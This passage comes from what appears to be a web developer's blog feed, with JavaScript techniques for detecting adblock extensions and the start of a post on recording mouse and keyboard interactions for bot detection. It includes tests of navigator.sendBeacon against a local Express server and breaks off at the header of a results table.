<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[</span>
<span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">adblockTests</span><span class="p">.</span><span class="nx">uBlockOrigin</span><span class="p">),</span>
<span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">adblockTests</span><span class="p">.</span><span class="nx">adblockPlus</span><span class="p">),</span>
<span class="p">];</span>
<span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">results</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">({</span>
<span class="nx">uBlockOrigin</span><span class="o">:</span> <span class="nx">results</span><span class="p">[</span><span class="mf">0</span><span class="p">],</span>
<span class="nx">adblockPlus</span><span class="o">:</span> <span class="nx">results</span><span class="p">[</span><span class="mf">1</span><span class="p">],</span>
<span class="nx">usingAdblock</span><span class="o">:</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="mf">0</span><span class="p">]</span> <span class="o">===</span> <span class="kc">true</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="mf">1</span><span class="p">]</span> <span class="o">===</span> <span class="kc">true</span><span class="p">),</span>
<span class="p">});</span>
<span class="p">}).</span><span class="k">catch</span><span class="p">((</span><span class="nx">err</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
<p>Usage:</p>
<div class="highlight"><pre><span></span><code><span class="nx">detectAdblock</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">res</span><span class="p">)</span> <span class="p">});</span>
</code></pre></div>
<h3>Introduction</h3>
<p><a href="https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en">uBlock Origin</a> and <a href="https://adblockplus.org/">Adblock Plus</a> are famous anti advertisement browser extensions. Adblock software filter advertisement content from websites. Some folks consider the blocking of ads to be unethical, since publishers lose revenue. Other people regard the blocking of advertisements as their good right. I personally tend to be on the side of the latter group, since ads are way to obnoxious in general (<a href="https://incolumitas.com/2020/12/16/removing-youtube-ads-from-android-phone/">Especially on YouTube</a>).</p>
<p>On the technical side, uBlock Origin and Adblock Plus are designed quite straightforward. They make use of large text based filter lists and compare the items of those lists with the contents of HTML nodes or URLs. If there is a match, the HTML element is removed or the URL is not loaded. An example for such a list would be the well known <a href="https://easylist-downloads.adblockplus.org/easylist.txt">Easy List</a>. The filter lists for uBlock Origin can be <a href="https://github.com/uBlockOrigin/uAssets/tree/master/filters">found on their GitHub repo</a>.</p>
<p>However, sometimes it is necessary to be able to detect that an Adblocker is active. Ideally, the detection should <strong>work by using vanilla JavaScript only</strong>. In this blog post, I will show several different techniques to detect the presence of Adblock software.</p>
<p>All code snippets were tested with <strong>Firefox/84.0</strong> and <strong>Chrome/86.0.4240.75</strong>.
On the Firefox browser, Adblock Plus is running. uBlock Origin is activated on Chrome.</p>
<h3>Attempt 1: Detect Adblock with a baiting div node</h3>
<p>With this technique, the idea is to create an <code><div></code> element dynamically and set the class attribute to <code>adsbox</code>. If an Adblocker is active, it should automatically remove this div element, because the class name is flagged as suspicious.</p>
<p>The technique is being used in the <a href="https://github.com/fingerprintjs/fingerprintjs/blob/master/src/sources/adblock.ts">fingerprint.js library</a>.</p>
<p>Try it out by pasting the code below in your browser JavaScript console.</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithAdsDiv</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">detected</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">ads</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'div'</span><span class="p">);</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="s1">'&nbsp;'</span><span class="p">;</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">className</span> <span class="o">=</span> <span class="s1">'adsbox'</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">ads</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">node</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="s1">'.adsbox'</span><span class="p">);</span>
<span class="nx">detected</span> <span class="o">=</span> <span class="o">!</span><span class="nx">node</span> <span class="o">||</span> <span class="nx">node</span><span class="p">.</span><span class="nx">offsetHeight</span> <span class="o">===</span> <span class="mf">0</span><span class="p">;</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="nx">ads</span><span class="p">.</span><span class="nx">parentNode</span><span class="p">.</span><span class="nx">removeChild</span><span class="p">(</span><span class="nx">ads</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Using Adblocker: '</span> <span class="o">+</span> <span class="nx">detected</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<p>This technique did <strong>not work</strong> on both tested browsers. Therefore, the above code is obsolete.</p>
<p>The same technique was tried with other <a href="https://stackoverflow.com/questions/4869154/how-to-detect-adblock-on-my-website">CSS class names</a>, but nothing worked reliably.</p>
<h3>Attempt 2: Detect Adblock by downloading suspicious ad scripts</h3>
<p>After some searching in the Internet, I found the <a href="https://jonathanmh.com/how-to-detect-ad-blockers-adblock-ublock-etc/">following blog post</a>.</p>
<p>The idea is the following: The author tried to make a <code>fetch()</code> request to a advertisement script, if the request is getting blocked, there must be an active Adblocker in the background.</p>
<p>For testing purposes, a <code>goodURL</code> is picked that should not get blocked, since it is a widely used JavaScript library for interactive content. On the other side, the <code>badURL</code> is a URL that points to a Google Advertising script. The <code>badURL</code> is listed in the Adblock filter list.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">goodURL</span> <span class="o">=</span> <span class="s1">'https://cdnjs.cloudflare.com/ajax/libs/Chart.js/2.9.4/Chart.min.js'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
</code></pre></div>
<p>The code from the mentioned blog post was a bit modified. But essentially, it boils down to the following:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithFetch</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">myRequest</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Request</span><span class="p">(</span><span class="nx">badURL</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'HEAD'</span><span class="p">,</span>
<span class="nx">mode</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="p">});</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">myRequest</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">response</span> <span class="p">=></span> <span class="nx">response</span><span class="p">.</span><span class="nx">text</span><span class="p">())</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Not Using Adblock'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">){</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Using Adblock'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">finally</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t1</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Took '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">t1</span><span class="o">-</span><span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">);</span>
<span class="p">})</span>
<span class="p">})();</span>
</code></pre></div>
<p>Unfortunately, this <strong>also does not work reliably</strong>. There are a couple of reasons why the above technique is not ideal:</p>
<ol>
<li>The <code>fetch()</code> API is still not supported in all browsers because it is relatively new</li>
<li><code>fetch()</code> tends to have issues with CORS requests</li>
</ol>
<h3>A first solution: Dynamically creating a <code><script></code> tag</h3>
<p>Dynamically creating a <code><script></code> tag is a better idea, since <code><script></code> tags are supported in every browser
and the issues with CORS and the same origin policy do not apply.</p>
<p>The following solution works reliably in both Firefox and Chrome. Both Adblock plugins could be detected with the below snippet:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">badURL</span> <span class="o">=</span> <span class="s1">'https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectWithScriptTag</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Not using Adblocker, script loaded in "</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">);</span>
<span class="c1">// delete script node</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">parentNode</span><span class="p">.</span><span class="nx">removeChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">};</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">).</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">2</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'ms'</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"Using Adblocker, script failed to load after "</span> <span class="o">+</span> <span class="nx">elapsed</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">badURL</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>
<p>After pasting the above snippet into the developer console, we see the error <strong>net::ERR_BLOCKED_BY_CLIENT</strong> which indicates that uBlock Origin
intercepted the request and aborted it. It can also be seen that the request took only 7.96ms, which is way too fast for a legit HTTP request.</p>
<figure>
<img src="https://incolumitas.com/images/uBlock-detected.png" alt="uBlock Origin detected" />
<figcaption>The extension uBlock Origin is being detected in Chrome</figcaption>
</figure>
<p>When using the above technique in production, several points need to be considered:</p>
<ol>
<li>Every time the above script is executed without a active Adblock software, a HTTP request is made and a script is downloaded. This costs network bandwidth resources.</li>
<li>If the <code>badURL</code> is no longer an URL that is on the Adblock filter list, the technique ceases to work. Therefore, the validity of the <code>badURL</code> needs to be ensured.</li>
</ol>
<h3>The ultimate solution: Making a request to a non-existent baiting resource</h3>
<p>Assuming that most browsers do not have adblock software installed, we want a detection method that is fast and doesn't waste resources.
However, the solution presented above does waste unnecessary resources: On a browser without adblock, every time the function is executed, the browser loads the advertisement script.</p>
<p>One idea would be to take a non-existent URL that is universally detected by adblock software, but will not properly load in the case when there is no adblock software installed.</p>
<p>This is the ultimate adblock detection solution. You can paste it in your developer console and it should be able to detect any adblock software. It also supports a fallback to <code>XMLHttpRequest</code> in case the <code>fetch()</code> API is not available.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Author: Nikolai Tschacher</span>
<span class="c1">// Date: 28.12.2020</span>
<span class="c1">// Website: https://incolumitas.com/</span>
<span class="p">(</span><span class="kd">function</span> <span class="nx">detectAdblockWithInvalidURL</span><span class="p">(</span><span class="nx">callback</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">flaggedURL</span> <span class="o">=</span> <span class="s1">'pagead/js/adsbygoogle.js'</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">fetch</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Request</span><span class="p">(</span><span class="nx">flaggedURL</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">method</span><span class="o">:</span> <span class="s1">'HEAD'</span><span class="p">,</span>
<span class="nx">mode</span><span class="o">:</span> <span class="s1">'no-cors'</span><span class="p">,</span>
<span class="p">});</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">request</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">response</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mf">404</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s1">'HEAD'</span><span class="p">,</span> <span class="nx">flaggedURL</span><span class="p">,</span> <span class="kc">false</span><span class="p">);</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">status</span> <span class="o">===</span> <span class="mf">404</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">callback</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">})(</span><span class="kd">function</span><span class="p">(</span><span class="nx">usingAdblock</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"Using Adblocker: "</span> <span class="o">+</span> <span class="nx">usingAdblock</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>Behavioral Analysis: Recording Mouse Movements and other User Interactions with JavaScript2020-12-24T16:53:00+01:002020-12-28T23:24:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-24:/2020/12/24/recording-mouse-movements-with-javascript/<p>In this blog post, I will introduce a JavaScript library that allows to track various user interactions of website visitors. Several key problems that arise when creating a JavaScript analytics application will be discussed and solved in this blog post.</p><h3>Motivation</h3>
<p>Most JavaScript analytics applications aim to visualize and provide statistics of the browsing behavior of website visitors. This is not my motivation for recording and storing analytics data. Instead, I want to make a <em>simple</em> statement on the grounds of user interaction data:</p>
<ol>
<li>Whether the user interaction data seems to be of human nature</li>
<li>Or whether the data is generated by a automated program - a so called bot or automated user agent</li>
</ol>
<p>Put differently, I want to <strong>classify user interaction data as either human or bot-like</strong>.</p>
<p>This is a very hard problem and there is no straightforward solution to it.</p>
<p>Currently, I am in the process of building a well-structured library that allows me to collect and store user interaction data for the next processing step. This technical topic will be the focus of this blog post.</p>
<p>When the point arrives that enough data has been collected, I will have to design a system that classifies the data according to the above criteria. One possible solution would be to create a training set to feed a deep neuronal network. However, the training data must be pre-classified into the categories human or bot. This initial classification step could be quite a daunting task alone.</p>
<p>Another problem is, that it is actually not that simple to find a large sample size of bot-generated interaction data, since a lot of bots do not create mouse or key-pressing events.</p>
<p>Only very sophisticated bots actually aim to mimic and replicate human behavior in the sense that their goal is to create user interaction events as a human would when they are browsing the web.</p>
<h3>ReCaptcha v2 and v3</h3>
<p>The standard method of telling humans apart from bots is Google's ReCaptcha system. In 2018, the new ReCaptcha v3 was introduced. The v2 version basically tasked the suspected user with a challenge that is hard to solve for computers, but relatively easy for humans.</p>
<p>The new v3 version is fully transparent and computes a continuous score between 0 (bot) and 1 (human) to rate all actions occurring on a website. This <a href="https://datadome.co/bot-detection/recaptchav2-recaptchav3-efficient-bot-protection/">blog post</a> gives an excellent overview of the subject.</p>
<p>Both ReCaptcha versions give a significantly better score to users that are using Google's Chrome browser and are logged in into their Google account. If you delete your Google cookies and you are using Firefox and you block third party cookies, you will be faced with a significantly lower score. </p>
<p>The consequence of a low score can be twofold:</p>
<ol>
<li>You will get banned from using the website that is using Google ReCaptcha v3</li>
<li>You will have to solve an actual ReCaptcha v2 challenge to prove your humanness </li>
</ol>
<p>From Google's perspective, it makes perfect sense to sanction users that are not logged into one of the many Google services or are are not using the Chrome browser. Owning a Google account proves a lot: That you are watching YouTube videos, writing E-Mails with Gmail or that you are using your Android Phone. All those apps verify on the side that you are an human. </p>
<p>The <strong>big BUT</strong> is obvious: </p>
<p>When there is no active usage history of you, you are automatically considered as second class Internet citizen. This is very dangerous. The classification whether you are considered a human or a bot should be based on current data, not on past usage history.</p>
<p>In that sense, this essay makes an argument for instant bot classification based on behavioral analytics on your current session.</p>
<p>Worded differently, if you jump around like crazy and your keyboard is typing millions of words per second, you are probably a bot.</p>
<p>On the other hand, when you read a blog article <em>like this</em> very carefully and your mouse pointer is following each line in a smooth, human like fashion, you probably are a human being.</p>
<h3>User Interaction Data</h3>
<p>So what kind of user interaction data should be recorded by the JavaScript library? Currently, the library captures the following user induced events:</p>
<ol>
<li><code>mousemove</code> Store the (x,y) coordinates of the current mouse cursor</li>
<li><code>mousedown</code> Store the (x,y) coordinates of a mouse left click</li>
<li><code>scroll</code> Store the <code>document.scrollingElement.scrollLeft</code> and <code>document.scrollingElement.scrollTop</code> variables when a scroll event happens</li>
<li><code>keydown</code> Store the currently pressed key code</li>
<li><code>resize</code> Fires when the viewport is resized. The new viewport size is stored</li>
<li><code>contextmenu</code> This event is fired when the user makes a right click with the mouse. The coordinates of the right click are stored</li>
<li><code>touchstart</code> Mobile touch event. This event is generated when the user taps on the screen</li>
<li><code>touchmove</code> Mobile touch event. This event arises when the user moves with their fingers across the touch screen</li>
<li><code>touchcancel</code> Mobile touch event. Fires when a touch event is canceled</li>
<li><code>touchend</code> Mobile touch event. Is fired when the finger is lifted from the touch screen</li>
</ol>
<h3>When to send behavioral analytics data to the server?</h3>
<p>One tricky problem with JavaScript analytics applications is the question of when and how to send the recorded data to the server. Obviously, one key requirement is to record user interaction data as long as possible until to the point when the user leaves the page.</p>
<p>However, when the recording of user interaction data stops too early, crucial data is missing for analysis. When we record for too long, it can become problematic to send the data to the server. What would be a suitable event to consider for this requirement? A couple of different events can be considered in this regard:</p>
<ol>
<li><code>beforeunload</code> Fired right before the window, the document and its resources are about to be unloaded. This is a cancelable event.</li>
<li><code>unload</code> Fires when the document or a child resource is being unloaded. This event is fired after the <code>beforeunload</code> and <code>pagehide</code> event. An error in the event handler will not stop the unloading workflow.</li>
<li><code>pagehide</code> event is sent to a Window when the browser hides the current page by presenting a different page from the session's history. When pressing the "back button", this event is fired.</li>
<li><code>visibilitychange</code> is fired when the content of a page has become visible or hidden.</li>
</ol>
<p>An excellent article named <a href="https://www.igvita.com/2015/11/20/dont-lose-user-and-app-state-use-page-visibility/">"Don't lose user and app state, use Page Visibility"</a> makes an case for the <code>visibilitychange</code> event API. No other event should be used to send analytics data to the remote server, especially because the other events fire unreliably.</p>
<h3>How to send the recorded data?</h3>
<p>The next question to be answered is how the recorded data should be transmitted to the remote server. There are several possibilities that come to mind:</p>
<ol>
<li>Use the good old <code>XMLHttpRequest</code> object to make HTTP requests (also called Ajax)</li>
<li>Use the relatively new <code>fetch()</code> HTTP API</li>
<li>Make use of an <code><img></code> tag and use the <code>src</code> attribute to transmit data in the query string</li>
<li>Use <code>navigator.sendBeacon()</code> to asynchronously send a small amount of data over HTTP to a web server</li>
</ol>
<p>The <code>navigator.sendBeacon()</code> API was introduced exactly for the purpose to asynchronously transmit data before the page is being closed. The mandatory reading list for this topic is the <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">related MDN page</a>.</p>
<blockquote>
<p>The navigator.sendBeacon() method asynchronously sends a small amount of data over HTTP to a web server. It’s intended to be used in combination with the visibilitychange event (but not with the unload and beforeunload events).</p>
</blockquote>
<h4>Testing <code>sendBeacon()</code> behavior with different events</h4>
<p>In this section, the reliability of <code>sendBeacon()</code> is tested in combination with different events.</p>
<p>The following simple <code>express</code> server can be used to listen for incoming POST requests from <code>navigator.sendBeacon()</code>. </p>
<p>Install it with the command: </p>
<p><code>npm install express body-parser cors</code> </p>
<p>and then launch the server with: </p>
<p><code>node server.js</code>.</p>
<p>Let's assume the server is running on <code>http://localhost:8888</code> from now on.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// server.js</span>
<span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'cors'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'body-parser'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'path'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">8888</span><span class="p">;</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">express</span><span class="p">.</span><span class="nx">json</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">cors</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="nx">limit</span><span class="o">:</span> <span class="s1">'2mb'</span> <span class="p">}));</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">text</span><span class="p">());</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="s1">'/data'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mf">200</span><span class="p">).</span><span class="nx">send</span><span class="p">(</span><span class="s1">'ok'</span><span class="p">);</span>
<span class="p">});</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening on port </span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div>
<p>The following code snippets are to be executed within the web page context. You can also paste them into the developer console directly.</p>
<p>First, let's see how the <code>visibilitychange</code> event is handled in JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s2">"visibilitychange"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">visibilityState</span> <span class="o">===</span> <span class="s1">'hidden'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">n</span><span class="o">++</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">message</span> <span class="o">=</span> <span class="s1">'visibilitychange - hidden - '</span> <span class="o">+</span> <span class="nx">n</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="s1">'http://localhost:8888/data'</span><span class="p">,</span> <span class="nx">message</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
</code></pre></div>
<p>A similar code snippet for the <code>beforeunload</code> event:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">n</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'beforeunload'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">n</span><span class="o">++</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">message</span> <span class="o">=</span> <span class="s1">'beforeunload - '</span> <span class="o">+</span> <span class="nx">n</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">sendBeacon</span><span class="p">(</span><span class="s1">'http://localhost:8888/data'</span><span class="p">,</span> <span class="nx">message</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<p>The same logic holds for the <code>pagehide</code> and <code>unload</code> event and is excluded here for simplicity.</p>
<h4>Test Results for mobile and desktop browsers</h4>
<p>As the code snippets above demonstrate, we hook into an event from the page lifecycle and then attempt to send a small amount of data to our web server.</p>
<p>We consider the event to be a success if BOTH of the following points hold:</p>
<ol>
<li>The browser actually fired the event in question</li>
<li>The browser succeeded in sending the data with <code>navigator.sendBeacon()</code></li>
</ol>
<p>Therefore, it is possible that the browser succeeds in firing the event, but fails to deliver the payload data with <code>navigator.sendBeacon()</code>. This would still be considered as an failure, regardless that another transmission method might be successful.</p>
<p>The different events from above where tested on a desktop computer <strong>Ubuntu 18.04.5 LTS</strong> and on a <strong>Android Phone Motorola g(6)</strong> running Android version 9. On both the desktop and mobile platform, Firefox and Chrome were tested.</p>
<p>With the Chrome browser and the Firefox browser on a Desktop computer (<strong>Ubuntu 18.04.5 LTS</strong>) the following results were obtained.</p>
<p>The symbol <strong>✓</strong> indicates that the payload data was successfully received in the express server. The symbol <strong>✗</strong> states the opposite.</p>
<table>
<thead>
<tr>
<th>Event</th>
<th>Action</th>
<th>Desktop Chrome/86.0.4240.75</th>
<th>Desktop Firefox/84.0</th>
</tr>
</thead>
